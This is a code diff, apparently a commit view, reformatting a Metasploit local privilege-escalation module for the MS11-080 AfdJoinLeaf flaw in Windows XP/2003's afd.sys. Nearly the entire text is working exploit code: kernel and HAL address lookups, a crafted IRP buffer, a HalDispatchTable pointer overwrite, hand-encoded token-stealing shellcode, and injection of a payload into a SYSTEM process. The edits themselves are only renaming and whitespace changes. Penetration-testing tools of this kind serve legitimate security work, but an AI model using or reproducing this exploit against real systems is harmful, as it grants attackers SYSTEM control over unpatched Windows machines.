@@ -22,23 +22,23 @@ class Metasploit3 < Msf::Exploit::Local
2222
2323 def initialize ( info = { } )
2424 super ( update_info ( info , {
25- 'Name' => 'AfdJoinLeaf Privilege Escalation' ,
25+ 'Name' => 'MS11-080 AfdJoinLeaf Privilege Escalation' ,
2626 'Description' => %q{
2727 This module exploits a flaw in the AfdJoinLeaf function of the
2828 afd.sys driver to overwrite data in kernel space. An address
2929 within the HalDispatchTable is overwritten and when triggered
3030 with a call to NtQueryIntervalProfile will execute shellcode.
31-
31+
3232 This module will elevate itself to SYSTEM, then inject the payload
3333 into another SYSTEM process before restoring it's own token to
3434 avoid causing system instability.
3535 } ,
3636 'License' => MSF_LICENSE ,
37- 'Author' => [
38- 'Matteo Memelli' , # original exploit and all the hard work
39- 'Spencer McIntyre' # MSF module
40- ] ,
41- 'Version' => '$Revision$' ,
37+ 'Author' =>
38+ [
39+ 'Matteo Memelli' , # original exploit and all the hard work
40+ 'Spencer McIntyre' # MSF module
41+ ] ,
4242 'Arch' => [ ARCH_X86 ] ,
4343 'Platform' => [ 'windows' ] ,
4444 'SessionTypes' => [ 'meterpreter' ] ,
@@ -50,9 +50,9 @@ def initialize(info={})
5050 [
5151 [ 'Automatic' , { } ] ,
5252
53- [ 'Windows XP SP2 / SP3' ,
54- {
55- 'HaliQuerySystemInfo' => 0x16bba ,
53+ [ 'Windows XP SP2 / SP3' ,
54+ {
55+ 'HaliQuerySystemInfo' => 0x16bba ,
5656 'HalpSetSystemInformation' => 0x19436 ,
5757 '_KPROCESS' => "\x44 " ,
5858 '_TOKEN' => "\xc8 " ,
@@ -87,7 +87,7 @@ def initialize(info={})
8787 ] )
8888
8989 end
90-
90+
9191 def find_sys_base ( drvname )
9292 session . railgun . add_dll ( 'psapi' ) if not session . railgun . dlls . keys . include? ( 'psapi' )
9393 session . railgun . add_function ( 'psapi' , 'EnumDeviceDrivers' , 'BOOL' , [ [ "PBLOB" , "lpImageBase" , "out" ] , [ "DWORD" , "cb" , "in" ] , [ "PDWORD" , "lpcbNeeded" , "out" ] ] )
@@ -107,7 +107,7 @@ def find_sys_base(drvname)
107107 end
108108 end
109109 end
110-
110+
111111 # Function borrowed from smart_hashdump
112112 def get_system_proc
113113 # Make sure you got the correct SYSTEM Account Name no matter the OS Language
@@ -134,7 +134,7 @@ def exploit
134134 print_error ( "Running against 64-bit systems is not supported" )
135135 return
136136 end
137-
137+
138138 mytarget = target
139139 if mytarget . name =~ /Automatic/
140140 os = sysinfo [ "OS" ]
@@ -147,71 +147,83 @@ def exploit
147147 if ( ( os =~ /\. net server/i ) and ( os =~ /service pack 2/i ) )
148148 mytarget = targets [ 2 ]
149149 end
150-
150+
151151 if mytarget . name =~ /Automatic/
152152 print_error ( "Could not identify the target system, it may not be supported" )
153153 return
154154 end
155155 print_status ( "Running against #{ mytarget . name } )
156156 end
157-
157+
158158 if is_system?
159159 print_error ( "This meterpreter session is already running as SYSTEM" )
160160 return
161161 end
162-
162+
163163 this_proc = session . sys . process . open
164164 kernel_info = find_sys_base ( nil )
165165 base_addr = 0x1001
166166 print_status ( "Kernel Base Address: 0x#{ kernel_info [ 0 ] . to_s ( 16 ) } )
167-
167+
168168 result = session . railgun . ws2_32 . WSASocketA ( "AF_INET" , "SOCK_STREAM" , "IPPROTO_TCP" , nil , nil , 0 )
169169 socket = result [ 'return' ]
170-
170+
171171 irpstuff = rand_text_alpha ( 8 )
172172 irpstuff << "\x00 \x00 \x00 \x00 "
173173 irpstuff << rand_text_alpha ( 4 )
174174 irpstuff << "\x01 \x00 \x00 \x00 "
175175 irpstuff << "\xe8 \x00 " + "4" + "\xf0 \x00 "
176176 irpstuff << rand_text_alpha ( 231 )
177-
177+
178178 if not this_proc . memory . writable? ( 0x1000 )
179- session . railgun . add_function ( 'ntdll' , 'NtAllocateVirtualMemory' , 'DWORD' , [ [ "DWORD" , "ProcessHandle" , "in" ] , [ "PBLOB" , "BaseAddress" , "inout" ] , [ "PDWORD" , "ZeroBits" , "in" ] , [ "PBLOB" , "RegionSize" , "inout" ] , [ "DWORD" , "AllocationType" , "in" ] , [ "DWORD" , "Protect" , "in" ] ] )
179+ session . railgun . add_function (
180+ 'ntdll' ,
181+ 'NtAllocateVirtualMemory' ,
182+ 'DWORD' ,
183+ [
184+ [ "DWORD" , "ProcessHandle" , "in" ] ,
185+ [ "PBLOB" , "BaseAddress" , "inout" ] ,
186+ [ "PDWORD" , "ZeroBits" , "in" ] ,
187+ [ "PBLOB" , "RegionSize" , "inout" ] ,
188+ [ "DWORD" , "AllocationType" , "in" ] ,
189+ [ "DWORD" , "Protect" , "in" ]
190+ ] )
191+
180192 result = session . railgun . ntdll . NtAllocateVirtualMemory ( -1 , [ base_addr ] . pack ( "L" ) , nil , [ 0x1000 ] . pack ( "L" ) , "MEM_COMMIT | MEM_RESERVE" , "PAGE_EXECUTE_READWRITE" )
181193 end
182194 if not this_proc . memory . writable? ( 0x1000 )
183195 print_error ( 'Failed to properly allocate memory' )
184196 return
185197 end
186198 this_proc . memory . write ( 0x1000 , irpstuff )
187-
199+
188200 hKernel = session . railgun . kernel32 . LoadLibraryExA ( kernel_info [ 1 ] , 0 , 1 )
189201 hKernel = hKernel [ 'return' ]
190202 halDispatchTable = session . railgun . kernel32 . GetProcAddress ( hKernel , "HalDispatchTable" )
191203 halDispatchTable = halDispatchTable [ 'return' ]
192204 halDispatchTable -= hKernel
193205 halDispatchTable += kernel_info [ 0 ]
194206 print_status ( "HalDisPatchTable Address: 0x#{ halDispatchTable . to_s ( 16 ) } )
195-
207+
196208 halbase = find_sys_base ( "hal.dll" ) [ 0 ]
197209 haliQuerySystemInformation = halbase + mytarget [ 'HaliQuerySystemInfo' ]
198210 halpSetSystemInformation = halbase + mytarget [ 'HalpSetSystemInformation' ]
199211 print_status ( "HaliQuerySystemInformation Address: 0x#{ haliQuerySystemInformation . to_s ( 16 ) } )
200212 print_status ( "HalpSetSystemInformation Address: 0x#{ halpSetSystemInformation . to_s ( 16 ) } )
201-
213+
202214 #### Exploitation ####
203215 shellcode_address_dep = 0x0002071e
204216 shellcode_address_nodep = 0x000207b8
205217 padding = make_nops ( 2 )
206218 halDispatchTable0x4 = halDispatchTable + 0x4
207219 halDispatchTable0x8 = halDispatchTable + 0x8
208-
220+
209221 restore_ptrs = "\x31 \xc0 "
210222 restore_ptrs << "\xb8 " + [ halpSetSystemInformation ] . pack ( "L" )
211223 restore_ptrs << "\xa3 " + [ halDispatchTable0x8 ] . pack ( "L" )
212224 restore_ptrs << "\xb8 " + [ haliQuerySystemInformation ] . pack ( "L" )
213225 restore_ptrs << "\xa3 " + [ halDispatchTable0x4 ] . pack ( "L" )
214-
226+
215227 tokenstealing = "\x52 "
216228 tokenstealing << "\x53 "
217229 tokenstealing << "\x33 \xc0 "
@@ -230,7 +242,7 @@ def exploit
230242 tokenstealing << "\x5b "
231243 tokenstealing << "\x5a "
232244 tokenstealing << "\xc2 \x10 "
233-
245+
234246 restore_token = "\x52 "
235247 restore_token << "\x33 \xc0 "
236248 restore_token << "\x64 \x8b \x80 \x24 \x01 \x00 \x00 "
@@ -239,46 +251,68 @@ def exploit
239251 restore_token << "\x89 \x90 " + mytarget [ '_TOKEN' ] + "\x00 \x00 \x00 "
240252 restore_token << "\x5a "
241253 restore_token << "\xc2 \x10 "
242-
254+
243255 shellcode = padding + restore_ptrs + tokenstealing
244-
256+
245257 this_proc . memory . write ( shellcode_address_dep , shellcode )
246258 this_proc . memory . write ( shellcode_address_nodep , shellcode )
247259 this_proc . memory . protect ( 0x00020000 )
248-
260+
249261 addr = [ 2 , 4455 , 0x7f000001 , 0 , 0 ] . pack ( "s!S!L!L!L!" )
250262 result = session . railgun . ws2_32 . connect ( socket , addr , addr . length )
251263 if result [ 'return' ] != 0xffffffff
252264 print_error ( "The socket is not in the correct state" )
253265 return
254266 end
255-
256- session . railgun . add_function ( 'ntdll' , 'NtDeviceIoControlFile' , 'DWORD' , [ [ "DWORD" , "FileHandle" , "in" ] , [ "DWORD" , "Event" , "in" ] , [ "DWORD" , "ApcRoutine" , "in" ] , [ "DWORD" , "ApcContext" , "in" ] , [ "PDWORD" , "IoStatusBlock" , "out" ] , [ "DWORD" , "IoControlCode" , "in" ] , [ "LPVOID" , "InputBuffer" , "in" ] , [ "DWORD" , "InputBufferLength" , "in" ] , [ "LPVOID" , "OutputBuffer" , "in" ] , [ "DWORD" , "OutPutBufferLength" , "in" ] ] )
257- session . railgun . add_function ( 'ntdll' , 'NtQueryIntervalProfile' , 'DWORD' , [ [ "DWORD" , "ProfileSource" , "in" ] , [ "PDWORD" , "Interval" , "out" ] ] )
258-
267+
268+ session . railgun . add_function (
269+ 'ntdll' ,
270+ 'NtDeviceIoControlFile' ,
271+ 'DWORD' ,
272+ [
273+ [ "DWORD" , "FileHandle" , "in" ] ,
274+ [ "DWORD" , "Event" , "in" ] ,
275+ [ "DWORD" , "ApcRoutine" , "in" ] ,
276+ [ "DWORD" , "ApcContext" , "in" ] ,
277+ [ "PDWORD" , "IoStatusBlock" , "out" ] ,
278+ [ "DWORD" , "IoControlCode" , "in" ] ,
279+ [ "LPVOID" , "InputBuffer" , "in" ] ,
280+ [ "DWORD" , "InputBufferLength" , "in" ] ,
281+ [ "LPVOID" , "OutputBuffer" , "in" ] ,
282+ [ "DWORD" , "OutPutBufferLength" , "in" ]
283+ ] )
284+
285+ session . railgun . add_function (
286+ 'ntdll' ,
287+ 'NtQueryIntervalProfile' ,
288+ 'DWORD' ,
289+ [
290+ [ "DWORD" , "ProfileSource" , "in" ] , [ "PDWORD" , "Interval" , "out" ]
291+ ] )
292+
259293 print_status ( "Triggering AFDJoinLeaf pointer overwrite..." )
260294 result = session . railgun . ntdll . NtDeviceIoControlFile ( socket , 0 , 0 , 0 , 4 , 0x000120bb , 0x1004 , 0x108 , halDispatchTable0x4 + 0x1 , 0 )
261295 result = session . railgun . ntdll . NtQueryIntervalProfile ( 1337 , 4 )
262-
296+
263297 if not is_system?
264298 print_error ( "Exploit failed" )
265299 return
266300 end
267-
301+
268302 begin
269303 proc = get_system_proc
270304 print_status ( "Injecting the payload into SYSTEM process: #{ proc [ "name" ] } #{ proc [ "pid" ] } )
271305 host_process = client . sys . process . open ( proc [ "pid" ] , PROCESS_ALL_ACCESS )
272306 mem = host_process . memory . allocate ( payload . encoded . length + ( payload . encoded . length % 1024 ) )
273-
307+
274308 print_status ( "Writing #{ payload . encoded . length } #{ "0x%.8x" % mem } )
275309 host_process . memory . write ( mem , payload . encoded )
276310 host_process . thread . create ( mem , 0 )
277311 rescue ::Exception => e
278312 print_error ( "Failed to Inject Payload" )
279313 print_error ( e . to_s )
280314 end
281-
315+
282316 # Restore the token because apparently BSODs are frowned upon
283317 print_status ( "Restoring the original token..." )
284318 shellcode = padding + restore_ptrs + restore_token
0 commit comments